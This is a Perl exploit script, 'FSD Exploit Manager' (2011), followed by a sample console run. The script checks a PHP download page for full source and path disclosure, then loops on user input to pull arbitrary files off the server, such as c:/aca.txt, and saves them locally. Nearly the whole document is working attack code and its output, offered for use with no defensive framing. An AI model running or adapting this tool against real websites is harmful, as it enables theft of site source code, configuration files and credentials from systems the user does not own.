#!usr/bin/perl
#FSD Exploit Manager (C) Doddy Hackman 2011
 
use LWP::UserAgent;
use URI::Split qw(uri_split);
use File::Basename;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
$SIG{INT} = \&adios;
 
head();
if($ARGV[0]) {
ver($ARGV[0]);
} else {
sintax();
}
copyright();
 
sub ver {
 
my $page = shift;
print "\n[+] Target : ".$page."\n\n";
 
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
 
if ($path=~/\/(.*)$/) { 
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure Detect\a\n";
$code2 = toma($page."'");
if ($code2=~/No such file or directory in <b>(.*)<\/b> on line/) {
print "\n[+] Full Path Dislocure Detect : ".$1."\n";
}
installer();
while(1) {
print "\n\nurl>";
$SIG{INT} = \&adios;
chomp(my $url = <stdin>);
if (download($page.$url,"fsdlogs/".basename($url))) {
print "\n\n[+] File Downloaded\n";
system("start fsdlogs/".basename($url));
}
}
} else {
print "[-] Web not vulnerable\n\n";
}
}
}
 
sub adios {
print "\n\n[+] Good Bye\n";
copyright();
}
 
sub head {
print "\n\n-- == FSD Exploit Manager == --\n\n";
}
 
sub copyright {
print "\n\n-- == (C) Doddy Hackman 2011 == --\n\n";
exit(1);
}
 
sub sintax {
print "\n[+] Sintax : $0 <page>\n";
}
 
sub toma {
return $nave->get($_[0])->content;
}
 
sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
}}}
 
sub installer {
unless (-d "fsdlogs/") {
mkdir("fsdlogs/","777");
}}
 
# ¿ The End ? 
 

C:\Documents and Settings\Administrador\Escritorio\Todo\Warfactory II\proyectos\
FSD Exploit Manager>fsd.pl http://localhost/down.php?down=


-- == FSD Exploit Manager == --


[+] Target : http://localhost/down.php?down=

[+] Full Source Discloure Detect

[+] Full Path Dislocure Detect : C:\xampp\htdocs\down.php


url>c:/aca.txt


[+] File Downloaded


url>c:/aca.txt


[+] File Downloaded


[+] Good Bye


-- == (C) Doddy Hackman 2011 == --